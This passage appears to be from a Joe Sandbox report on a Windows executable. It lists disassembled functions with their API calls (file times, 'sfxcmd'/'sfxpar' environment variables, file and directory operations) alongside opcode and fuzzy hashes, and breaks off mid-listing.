Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: __allrem$H_prolog3_H_prolog3_catch_swprintf_wcslen
String ID: AES-0017$z01$zip$zipx$zx01
API String ID: 538351651-1958518654
Opcode ID: 602b8cd40dacb6f0eef9f5d33c06a5520b57d88c988c063c086c6ebbccb142e8
Instruction ID: 6d9830987df35638f6f2d991d0fa65fb480f2c51611560b83c636c8674828881
Opcode Fuzzy Hash: 602b8cd40dacb6f0eef9f5d33c06a5520b57d88c988c063c086c6ebbccb142e8
Instruction Fuzzy Hash: 8FD2ADB1900248DFDB26DF68EC85BAD7BF9FF18304F54805AE80DA7691D7319A81CB52

Function 0017ACD0 Relevance: 9.1, APIs: 6, Instructions: 104
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 0017AD33

Part of subcall function 00175032: GetVersionExW.KERNEL32(?), ref: 00175063

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0017AD57
FileTimeToSystemTime.KERNEL32(?,?), ref: 0017AD71
TzSpecificLocalTimeToSystemTime.KERNELBASE(00000000,?,?), ref: 0017AD84
SystemTimeToFileTime.KERNEL32(?,?), ref: 0017AD94
SystemTimeToFileTime.KERNEL32(?,?), ref: 0017ADA4

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 3d58bc69d99988de4639bc1421e95119cb4ed5f463f179bd03c83c35183087d9
Instruction ID: adbc2cd41578618682b2b5a1dee5b64e391490a361fe46d12cee285cf099d940
Opcode Fuzzy Hash: 3d58bc69d99988de4639bc1421e95119cb4ed5f463f179bd03c83c35183087d9
Instruction Fuzzy Hash: 704114761083059BC704DFA8C9849ABB7F8FF98704F04891EF999C7610E730D949CBA6

Function 00189773 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 300
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00189813

Strings

HIDE, xrefs: 0018989D
MIN, xrefs: 00189904
MAX, xrefs: 001898D0

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: _wcslen
String ID: HIDE$MAX$MIN
API String ID: 176396367-2426493550
Opcode ID: d7bbe4021062d3085dd963caaa94e7b4e5b930e2af5c59facd7a500c71aef05d
Instruction ID: 7ee2313fdd406d801c40b31c0990d7ec26834c3273ef64ff1a077622fb99ddc5
Opcode Fuzzy Hash: d7bbe4021062d3085dd963caaa94e7b4e5b930e2af5c59facd7a500c71aef05d
Instruction Fuzzy Hash: 10B18E31D00258DACF25EFA8CC85AEDB7B9BF55314F58419AE409B7241DB709B89CFA0

Function 0018AE2D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 0018AE34
SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 0018AE4C
SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 0018AEB7

Strings

sfxcmd, xrefs: 0018AE47
sfxpar, xrefs: 0018AEB2

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: EnvironmentVariable$H_prolog3_
String ID: sfxcmd$sfxpar
API String ID: 3605364767-3493335439
Opcode ID: c3767aa859c6ffff1d7f3f52575fa1c135aa0cdead01e14b0bdfdef67aaf0ef9
Instruction ID: 7097ae4ad0a47e07ab794feb8660697a5f1f0644396e882aa4ec86b7ea162071
Opcode Fuzzy Hash: c3767aa859c6ffff1d7f3f52575fa1c135aa0cdead01e14b0bdfdef67aaf0ef9
Instruction Fuzzy Hash: 0A211670D10218AFDB15EFA8D9959EDB7B9EF49301B50482AF841F7240DB30AA85CFA5

Function 00186357 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00186378
SHAutoComplete.SHLWAPI(?,00000010), ref: 001863AF

Part of subcall function 0017BF3C: CompareStringW.KERNEL32(00000400,00001001,B19080A7,000000FF,?,000000FF,001753ED,0000002E,-00000002,00000000,?,00000000,?,00000008,?,?), ref: 0017BF52

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0018639F

Strings

EDIT, xrefs: 00186383, 0018638E, 0018639B
@Ut, xrefs: 001863AF

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: @Ut$EDIT
API String ID: 4243998846-2065656831
Opcode ID: 791c34cc78cd7f31c65f962e60c08fe5cdbb9d5341ff747ea89ae65b3d7ebc90
Instruction ID: 5c0ab33d41ae6914d5856d14c2247a7c029a209e02d9cbecf5d146b06141aa35
Opcode Fuzzy Hash: 791c34cc78cd7f31c65f962e60c08fe5cdbb9d5341ff747ea89ae65b3d7ebc90
Instruction Fuzzy Hash: 36F06835A01718ABDB20AB659D05F9F7BBCAF46B11F004055FE04E7180D770DE458BE5

Function 0018655D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0017A473: __EH_prolog3_GS.LIBCMT ref: 0017A47A
Part of subcall function 0017A473: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 0017A4AF

OleInitialize.OLE32(00000000), ref: 00186576
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 001865AD
SHGetMalloc.SHELL32(001CAA78), ref: 001865B7

Strings

3So, xrefs: 0018658E
riched20.dll, xrefs: 00186565

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: DirectoryGdiplusH_prolog3_InitializeMallocStartupSystem
String ID: riched20.dll$3So
API String ID: 2446841611-3464455743
Opcode ID: 1007b035465c0a91accd599ac7018a825fe4c56780cf9054e0b8cdbf437e635b
Instruction ID: 147b0ec3ada4b1658b134c5985d12d837cf645a0dad6e85c45f846ee702b10e7
Opcode Fuzzy Hash: 1007b035465c0a91accd599ac7018a825fe4c56780cf9054e0b8cdbf437e635b
Instruction Fuzzy Hash: BBF049B5D00209ABCB10AFAAD849AAFFFFCEF94704F00401AE815E2201C7B49645CFA1

Function 00173650 Relevance: 7.7, APIs: 5, Instructions: 183
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,?,00000000,00000003,08000000,00000000,B19080A7,?,00000000,?,?,?,00000000,0019FCB8,000000FF), ref: 00173718
GetLastError.KERNEL32(?,?,00000000,0019FCB8,000000FF), ref: 0017372A
CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,?,?,?,00000000,0019FCB8,000000FF), ref: 00173776
GetLastError.KERNEL32(?,?,00000000,0019FCB8,000000FF), ref: 0017377F
SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,0019FCB8,000000FF), ref: 00173816

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: f22197c3c3b2c84758aa4a2e59adf212775ac0bc17fb1f8736d9f4c6ce6b11ba
Instruction ID: 249b0863a189e5ca36a629d2bd6aac96994253b8bb47e2441e924bb3e542fab2
Opcode Fuzzy Hash: f22197c3c3b2c84758aa4a2e59adf212775ac0bc17fb1f8736d9f4c6ce6b11ba
Instruction Fuzzy Hash: 106191B1904249AFDB18CF68CD45BEE7BB4FF09314F208219F92997391D7749A44CB94

Function 001875D8 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001875E9
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001875FA
IsDialogMessageW.USER32(0001048C,?), ref: 0018760E
TranslateMessage.USER32(?), ref: 0018761C
DispatchMessageW.USER32(?), ref: 00187626

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 4f413c7c72182f6768c3fc0ed33a14aa9bf7445c91c2010c7d0214e11ff00761
Instruction ID: 84b829097444aa820d729d8b8d83b19163bd80af09e70b9726fdf0515b70bd7b
Opcode Fuzzy Hash: 4f413c7c72182f6768c3fc0ed33a14aa9bf7445c91c2010c7d0214e11ff00761
Instruction Fuzzy Hash: 1FF0B7B690122AABDB20ABF6AC4CDEB7F7CEF052947504414F509D3450E768D945CBF1

Function 001817B1 Relevance: 6.3, APIs: 4, Instructions: 313
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__allrem.LIBCMT ref: 00181886
_strncpy.LIBCMT ref: 0018196E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001819AC
_strncpy.LIBCMT ref: 00181A85

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: _strncpy$Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 2527496121-0
Opcode ID: 715316fcdd5076330cf3ac0b77cb23ac6e3556dba4cf94b4cbf38732026775e5
Instruction ID: 0d9ded64e1a1b7096cdee6e8b533d7adb71835f61e8472d25f8550513937625b
Opcode Fuzzy Hash: 715316fcdd5076330cf3ac0b77cb23ac6e3556dba4cf94b4cbf38732026775e5
Instruction Fuzzy Hash: AAB1B2B69043149FC70AEF68EC85E2A7BF9FF98308F44452EE54593661E730D9858F82

Function 00173D88 Relevance: 6.1, APIs: 4, Instructions: 117
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 00173D8F
GetStdHandle.KERNEL32(000000F5,0000002C,0017F3B8,?,?,?,?,?,0017FBCE,001BA6BC,?,00180570,00010000), ref: 00173DB8
WriteFile.KERNEL32(?,?,?,00000000,00000000), ref: 00173DFE

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: FileH_prolog3_HandleWrite
String ID:
API String ID: 2898186245-0
Opcode ID: 1b254677023a1ac4260698582d71acea59cdfdef231fb067bc183025bde696a3
Instruction ID: f6c4be35e0748a947eb02538f1491ba2bf14f9e1e9ff4df9f1cffe4381afa7d1
Opcode Fuzzy Hash: 1b254677023a1ac4260698582d71acea59cdfdef231fb067bc183025bde696a3
Instruction Fuzzy Hash: 08419E30A05244AFDF14DFA8D884BADBB76AF95700F048019F819AB281CB319E85DBA1

Function 00174740 Relevance: 6.1, APIs: 4, Instructions: 96COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00174747
CreateDirectoryW.KERNELBASE(?,00000000,?,00000024,001742E9,?,00000001,00000000,?,?,?,?,?,00000024), ref: 00174770
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,00000024,001742E9,?,00000001,00000000,?,?), ref: 001747C6
GetLastError.KERNEL32(?,?,00000024,001742E9,?,00000001,00000000,?,?,?,?,?,00000024), ref: 00174834

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: CreateDirectory$ErrorH_prolog3_Last
String ID:
API String ID: 3709856315-0
Opcode ID: 7d6dbca0a63d57b6ba5b7208cac0991d8a14ae4a7494360eab0efdb15c04a286
Instruction ID: 27608c836e138e4c1ac0dc1f03a7670dd000db7dcd2a96ca4b7fb9039f24710f
Opcode Fuzzy Hash: 7d6dbca0a63d57b6ba5b7208cac0991d8a14ae4a7494360eab0efdb15c04a286
Instruction Fuzzy Hash: 7331B471901258ABDF14EFE8C988AEEBBF8EF59310F14841AF505E7250D7349A80CB75

Function 00173509 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00173519
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00173531
GetLastError.KERNEL32 ref: 00173563
GetLastError.KERNEL32 ref: 00173582

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: a6358ab49fd9d8b04efa0cc85bbc372882029e14f88e24d6c5fd6e255075c480
Instruction ID: eb83d309f0e01c260e4e99c2b70a2090eb11fb365566691e348742b2a8d29b66
Opcode Fuzzy Hash: a6358ab49fd9d8b04efa0cc85bbc372882029e14f88e24d6c5fd6e255075c480
Instruction Fuzzy Hash: 79117C71900204EBDF249B24C90896D37B9EB06361F20CA29F93A85190D771DF80EB52

Function 0017338A Relevance: 4.6, APIs: 3, Instructions: 115fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00173391
CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,?,?,?,?,00000024), ref: 00173405
CreateFileW.KERNEL32(?,?,?,00000000,00000002,00000000,00000000,?,?,?,?,?,?,?,00000024), ref: 00173455

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: CreateFile$H_prolog3_
String ID:
API String ID: 1771569470-0
Opcode ID: 28c7810b50d9a97ca76c8c815898b57c341236c4a2f0e7dc01a17e6b5bee66ba
Instruction ID: 905275bef51458c489885108f2fa7a3000fb0fc667024ca436e6b9451d9ece32
Opcode Fuzzy Hash: 28c7810b50d9a97ca76c8c815898b57c341236c4a2f0e7dc01a17e6b5bee66ba
Instruction Fuzzy Hash: D9416571D102089FDF28DFA4D889BEEB7B4FB08320F10861EE465E6291D7749A44DB74

Function 0017A473 Relevance: 4.6, APIs: 3, Instructions: 90libraryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0017A47A
GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 0017A4AF
LoadLibraryW.KERNELBASE(00000000,?,?,00000000,00000000,?), ref: 0017A521

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: DirectoryH_prolog3_LibraryLoadSystem
String ID:
API String ID: 1552931673-0
Opcode ID: 217ceea9cbbff08c5ed99c0672e1afdbc72c8132301daa6541e3aba6243dc14d
Instruction ID: a6b18ea652949f5e9ac194266008fcdca7b62c849f8e544771ffb5a9441b1029
Opcode Fuzzy Hash: 217ceea9cbbff08c5ed99c0672e1afdbc72c8132301daa6541e3aba6243dc14d
Instruction Fuzzy Hash: F0314F72D00208EBDB04EFE4C999BEEBBB8AF58314F10811DE509B7281DB745A45CBA1

Function 00174A2F Relevance: 4.6, APIs: 3, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00174A36
SetFileAttributesW.KERNELBASE(?,00000000,00000024,00174830,?,?,?,?,?,?,00000024,001742E9,?,00000001,00000000,?), ref: 00174A4C
SetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000024), ref: 00174A8F

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AttributesFile$H_prolog3_
String ID:
API String ID: 2559025557-0
Opcode ID: c262bebe98ec3f434561e8e2d07ebc39389de979b19e9ea6cc781b363adfaafa
Instruction ID: d3f29bb174b30e6117f4e2e85577d92ca68e5ad1c652b6749ea70acb835a42ff
Opcode Fuzzy Hash: c262bebe98ec3f434561e8e2d07ebc39389de979b19e9ea6cc781b363adfaafa
Instruction Fuzzy Hash: B7110A75940209ABDF14EFA8D9459EDB7B8FF08311F14802AF945F7251D7349A84CF68

Function 001743A5 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 001743AC
DeleteFileW.KERNELBASE(000000FF,00000024,00173503,?,?,001732FA,?,?,B19080A7,?,?,0019FC52,000000FF), ref: 001743BF
DeleteFileW.KERNEL32(?,000000FF,?,?,001732FA,?,?,B19080A7,?,?,0019FC52,000000FF), ref: 001743FF

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: DeleteFile$H_prolog3_
String ID:
API String ID: 3558260747-0
Opcode ID: 66a1f2a5d86ab373a4a5fae61c5fb998322c891821173aa785e033d1a558013c
Instruction ID: ad7cdc959fba77f14bc6f12223243ecd8f5061a2e7e33d1ded291acd020fd7d5
Opcode Fuzzy Hash: 66a1f2a5d86ab373a4a5fae61c5fb998322c891821173aa785e033d1a558013c
Instruction Fuzzy Hash: F7112871900219DBDF14EFA8D985AEEB7B8BF08311F14802AF805F7250DB349A84CBB4

Function 00174461 Relevance: 4.6, APIs: 3, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00174468
GetFileAttributesW.KERNELBASE(?,00000024,00174458,?,0017478C,?,?,00000024,001742E9,?,00000001,00000000,?,?), ref: 0017447B
GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00000024), ref: 001744BB

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AttributesFile$H_prolog3_
String ID:
API String ID: 2559025557-0
Opcode ID: d87a69ecc579909d2d66a8fccc52ccf5c802580802eb7dd6b89c861b89bed79f
Instruction ID: 906ff89c4d23ac26b5bbfe9288eb1613dc5fa07f5ce33f2cc483d915e9809c5e
Opcode Fuzzy Hash: d87a69ecc579909d2d66a8fccc52ccf5c802580802eb7dd6b89c861b89bed79f
Instruction Fuzzy Hash: 88112E71D002089BCF04EFA8D989AEDB7B5FB48321F14852AF409F3351D7349A85CB68

Function 0017386D Relevance: 3.1, APIs: 2, Instructions: 140COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 001739F7
GetLastError.KERNEL32 ref: 00173A06

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
